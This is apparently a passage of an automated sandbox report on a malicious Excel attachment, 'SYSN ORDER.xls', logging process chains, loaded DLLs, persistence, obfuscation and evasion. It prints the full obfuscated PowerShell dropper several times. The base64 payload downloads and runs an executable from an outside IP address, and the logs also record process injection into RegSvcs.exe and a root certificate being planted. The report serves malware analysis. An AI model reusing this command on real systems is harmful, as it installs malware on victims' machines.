            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wsock32.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: B8230000.0.dr Initial sample: OLE indicators vbamacros = False
            Source: SYSN ORDER.xls Initial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: ngxpd0hb.dll.8.dr Static PE information: real checksum: 0x0 should be: 0x1769
            Source: tnesdt30.dll.18.dr Static PE information: real checksum: 0x0 should be: 0xa26d
            Source: dllhost.exe.7.dr Static PE information: real checksum: 0xa2135 should be: 0xff670
            Source: dllhost[1].exe.7.dr Static PE information: real checksum: 0xa2135 should be: 0xff670
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A022D push eax; iretd 7_2_000007FE899A0241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A00BD pushad ; iretd 7_2_000007FE899A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A2243 pushad ; ret 7_2_000007FE899A2261

            Persistence and Installation Behavior

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
            Source: SYSN ORDER.xls Stream path 'Workbook' entropy: 7.9994310106 (max. 8.0)
            Source: B8230000.0.dr Stream path 'Workbook' entropy: 7.99946016923 (max. 8.0)

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Roaming\dllhost.exe API/Special instruction interceptor: Address: 35A229C
            Source: C:\Users\user\AppData\Roaming\dllhost.exe API/Special instruction interceptor: Address: 3AF229C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2180
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7784
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9520
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1407
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9771
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll
            Source: C:\Windows\System32\mshta.exe TID: 3644 Thread sleep time: -420000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep count: 2180 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep count: 7784 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\mshta.exe TID: 4016 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580 Thread sleep count: 1407 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580 Thread sleep count: 1698 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -300000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -2767011611056431s >= -30000s
            Source: dllhost.exe, 0000000B.00000003.441229287.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.478564452.0000000003AF7000.00000004.00000020.00020000.00000000.sdmp, differences.11.dr Binary or memory string: cQEmU]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003CFCB8 LdrInitializeThunk,14_2_003CFCB8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
